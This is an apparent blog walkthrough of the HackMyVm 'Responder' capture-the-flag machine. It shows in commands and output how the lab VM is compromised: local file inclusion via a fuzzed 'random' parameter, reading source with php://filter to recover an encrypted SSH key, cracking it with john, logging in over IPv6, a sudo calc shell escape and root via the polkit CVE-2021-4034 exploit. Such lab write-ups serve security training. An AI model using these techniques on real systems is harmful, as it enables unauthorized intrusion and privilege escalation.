HackMyVm Responder Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Responder

Scan ports, notice the port 22 is filtered.

 nmap -sV -sC -oN port.log 192.168.56.100
 Nmap scan report for darkmatter.hmv (192.168.56.100)
 Host is up (0.12s latency).
 Not shown: 998 closed tcp ports (conn-refused)
 PORT   STATE    SERVICE VERSION
 22/tcp filtered ssh
 80/tcp open     http    Apache httpd 2.4.38 ((Debian))
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 |_http-server-header: Apache/2.4.38 (Debian)

Check port 80, only a simple page tells the current time.

 ~/D/responder $curl 192.168.56.100                                              
 your answer is in the answer.. it's
 01:46
 and your time is running out..

Scan port 80, found filemanager.php. Scan threads can not be too big, I set it to 20.

 ~/D/responder $gobuster dir -u 192.168.56.100/ -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
 /index.php            (Status: 200) [Size: 73]
 /filemanager.php      (Status: 302) [Size: 0] [--> /]

Fuzz the param of filemanager.php, get random.

 ~/D/responder $wfuzz -u "192.168.56.100/filemanager.php?FUZZ=/etc/passwd"  -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                
 =====================================================================
 000003395:   302        27 L     39 W       1430 Ch     "random"

LFI worked, check passwd, get two user names.

 ~/D/responder $curl "192.168.56.100/filemanager.php?random=/etc/passwd"         
 root:x:0:0:root:/root:/bin/bash
 ...
 elliot:x:1001:1001::/home/elliot:/bin/bash
 rohit:x:1002:1002::/home/rohit:/bin/bash

After enum some linux files, we can not get shell through log files. So check source code of filemanager.php, we get a ssh key.

 ~/D/responder $curl "192.168.56.100/filemanager.php?random=php://filter/convert.base64-en
 code/resource=filemanager.php" |base64 -d                                                
 ...          
 <?php                                                                                    
     $filename = $_GET['random'];
     include($filename);
     header('Location:/');
 
 
 /*
 
 -----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,411124D3C302D4F4
 
 XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
 ...

Decrypt the ssh key with john.

 ~/D/responder $/usr/share/john/ssh2john.py id_rsa > hash.txt                     
 ~/D/responder $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt        
 ...
 Press 'q' or Ctrl-C to abort, almost any other key for status
 xxxxxx          (id_rsa)

Now we have the user name, ssh key and password to connect port 22, but port 22 is filtered. Maybe it can be connected through ipv6.

Check ipv6 address of the machine.

 ~/D/responder $ping6 -c2 -n -I eth1 ff02::1                                    
 ping6: Warning: source address might be selected on device other than: eth1
 PING ff02::1(ff02::1) from :: eth1: 56 data bytes
 ...
 64 bytes from fe80::a00:27ff:fec2:1426%eth1: icmp_seq=1 ttl=64 time=4.76 ms
 ...

Check port 22 with ipv6, yes, it's open.

 ~/D/responder $nmap -6 -p22 fe80::a00:27ff:fec2:1426%eth1    
 Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 08:59 CST
 Nmap scan report for fe80::a00:27ff:fec2:1426
 Host is up (0.0097s latency).
 
 PORT   STATE SERVICE
 22/tcp open  ssh

Log in ssh as user elliot.

 ~/D/responder $ssh elliot@fe80::a00:27ff:fec2:1426%eth1 -i id_rsa -6    
 Enter passphrase for key 'id_rsa':
 Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 elliot@responder:~$ id
 uid=1001(elliot) gid=1001(elliot) groups=1001(elliot)

Check sudo -l.

 elliot@responder:~$ sudo -l
 sudo: unable to resolve host responder: Temporary failure in name resolution
 Matching Defaults entries for elliot on responder:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User elliot may run the following commands on responder:
     (rohit) NOPASSWD: /usr/bin/calc

Run calc, enter help page, input "!/bin/bash" after ":".

 elliot@responder:~$ sudo -u rohit /usr/bin/calc
 sudo: unable to resolve host responder: Temporary failure in name resolution
 C-style arbitrary precision calculator (version 2.12.7.2)
 Calc is open software. For license details type:  help copyright
 [Type "exit" to exit, or "help" for help.]
 
 ; help
 ...
 For more information while running calc, type  help  followed by one of the
 following topics:
 
     topic               description
     -----               -----------
     intro               introduction to calc
     overview            overview of calc
     help                this file
 ...
 !/bin/bash
 ...
 rohit@responder:/home/elliot$ id
 uid=1002(rohit) gid=1002(rohit) groups=1002(rohit)

Check SUID files, notice polkit.

 elliot@responder:~$ find / -perm -u=s 2>/dev/null
 /usr/bin/passwd
 /usr/bin/chsh
 /usr/bin/newgrp
 /usr/bin/gpasswd
 /usr/bin/su
 /usr/bin/mount
 /usr/bin/pkexec
 /usr/bin/sudo
 /usr/bin/chfn
 /usr/bin/umount
 /usr/lib/policykit-1/polkit-agent-helper-1
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/openssh/ssh-keysign
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

Use the lastest CVE of polkit to get root.

 elliot@responder:/tmp$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
 elliot@responder:/tmp$ ./cve-2021-4034-poc
 # id
 uid=0(root) gid=0(root) groups=0(root),1001(elliot)

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年5月    »
1
2345678
9101112131415
16171819202122
23242526272829
3031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2